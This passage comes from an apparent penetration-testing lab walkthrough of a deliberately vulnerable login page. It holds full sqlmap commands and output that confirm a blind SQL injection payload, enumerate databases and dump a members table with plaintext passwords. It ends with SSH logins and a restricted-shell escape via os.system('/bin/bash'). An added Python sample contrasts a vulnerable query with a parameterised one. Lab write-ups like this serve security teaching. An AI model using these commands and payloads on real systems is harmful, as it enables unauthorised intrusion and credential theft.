[11:08:26] [INFO] testing 'Generic UNION query (41) - 62 to 80 columns'
[11:08:26] [INFO] testing 'Generic UNION query (82) - 82 to 100 columns'
[11:08:27] [INFO] testing 'MySQL UNION query (41) - 1 to 20 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 22 to 40 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 42 to 60 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 62 to 80 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (82) - 82 to 100 columns'
[11:08:28] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:08:28] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 429 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:08:37] [INFO] testing MySQL
[11:08:37] [INFO] confirming MySQL
[11:08:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:08:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'
[*] shutting down at 11:08:37
Conclusion:
From this result we can tell that the password field does indeed have a security hole: sqlmap confirmed a boolean-based blind injection in the mypassword POST parameter.
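To show why a lone quote produces an error page and why the sqlmap payload gets past the login, here is an added example (not the post's code and not the real checklogin.php, whose source is not shown): a constructed login check over an in-memory SQLite copy of the members table, in the vulnerable string-built form beside a parameterised one. The table schema and the query text are assumptions.

```python
"""Added example: a login check in the shape the sqlmap output implies
(POST fields myusername/mypassword looked up in a members table), first as
the vulnerable string-built query, then with bound parameters. Both are run
against the post's own two probes. Schema and query text are assumptions."""
import sqlite3

# Constructed copy of the members.members rows dumped later in the post.
ROWS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# Probe 1 from the post: a lone single quote in the password field.
PROBE_QUOTE = "'"
# Probe 2: the boolean-based payload sqlmap reported for mypassword.
PROBE_SQLMAP = "-7775' OR 1477=1477 AND 'InhH'='InhH"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)", ROWS)
    return db


def login_vulnerable(db: sqlite3.Connection, myusername: str, mypassword: str) -> bool:
    """String-built query: the submitted values become part of the SQL text,
    so a quote breaks the statement and OR 1477=1477 makes every row match."""
    sql = ("SELECT id FROM members WHERE username='%s' AND password='%s'"
           % (myusername, mypassword))
    return db.execute(sql).fetchone() is not None


def login_fixed(db: sqlite3.Connection, myusername: str, mypassword: str) -> bool:
    """Parameterised query: the values are bound and never parsed as SQL."""
    sql = "SELECT id FROM members WHERE username=? AND password=?"
    return db.execute(sql, (myusername, mypassword)).fetchone() is not None


def try_login(check, username: str, password: str) -> str:
    """Return 'ok', 'denied' or 'error' so the two versions can be compared."""
    db = make_db()
    try:
        return "ok" if check(db, username, password) else "denied"
    except sqlite3.Error:
        return "error"  # the SQL error page the post describes


if __name__ == "__main__":
    for name, check in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        print(name, "quote probe:", try_login(check, "admin", PROBE_QUOTE),
              "| sqlmap payload:", try_login(check, "admin", PROBE_SQLMAP))
```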
- Next we try to find the databases with the command below:
sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 --dbs
The result obtained is:
killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201604230a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:14:56
[11:14:56] [INFO] testing connection to the target URL
[11:14:56] [INFO] heuristics detected web page charset 'ascii'
[11:14:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:14:56] [INFO] testing MySQL
[11:14:57] [INFO] confirming MySQL
[11:14:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:14:57] [INFO] fetching database names
[11:14:57] [INFO] fetching number of databases
[11:14:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:14:57] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[11:15:02] [INFO] retrieved: information_schema
[11:15:02] [INFO] retrieved: members
[11:15:03] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql
[11:15:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'
[*] shutting down at 11:15:03
Conclusion:
From this result we have obtained the databases information_schema, members and mysql. The members database looks the most interesting, so next we go into the members database.
8. Run the commands below (in this part I will show it right through to getting into the table and viewing the username and password):
killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 -D members --tables
[sudo] password for killu:
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201604230a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:21:38
[11:21:38] [INFO] testing connection to the target URL
[11:21:38] [INFO] heuristics detected web page charset 'ascii'
[11:21:38] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:21:38] [INFO] testing MySQL
[11:21:38] [INFO] confirming MySQL
[11:21:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:21:38] [INFO] fetching tables for database: 'members'
[11:21:38] [INFO] fetching number of tables for database 'members'
[11:21:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:21:38] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
1
[11:21:58] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+
[11:21:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'
[*] shutting down at 11:21:58
killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 -D members -T members --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201604230a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:22:27
[11:22:27] [INFO] testing connection to the target URL
[11:22:27] [INFO] heuristics detected web page charset 'ascii'
[11:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:22:27] [INFO] testing MySQL
[11:22:27] [INFO] confirming MySQL
[11:22:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:22:27] [INFO] fetching columns for table 'members' in database 'members'
[11:22:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:22:27] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[11:22:29] [INFO] retrieved: id
[11:22:29] [INFO] retrieved: username
[11:22:29] [INFO] retrieved: password
[11:22:30] [INFO] fetching entries for table 'members' in database 'members'
[11:22:30] [INFO] fetching number of entries for table 'members' in database 'members'
[11:22:30] [INFO] retrieved: 2
[11:22:30] [INFO] retrieved: 1
[11:22:30] [INFO] retrieved: MyNameIsJohn
[11:22:31] [INFO] retrieved: john
[11:22:31] [INFO] retrieved: 2
[11:22:31] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:22:32] [INFO] retrieved: robert
[11:22:33] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
[11:22:33] [INFO] table 'members.members' dumped to CSV file '/root/.sqlmap/output/192.168.56.117/dump/members/members.csv'
[11:22:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'
[*] shutting down at 11:22:33
Conclusion:
Pay attention to this part =>
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
The username and password have been obtained.
9. Next, try logging in to the web page.
SUCCESS..
10. Now try to get into SSH as john with the password found earlier.
ssh john@192.168.56.117
The command
echo os.system('/bin/bash')
is used to get the user out of the access restriction imposed by the limited shell.
- Please also try SSH as robert.
AWESOME!!! I hope this is useful, and if there is any mistake in the explanation please leave a comment. I am only human and can make mistakes. Let's learn together. ^_^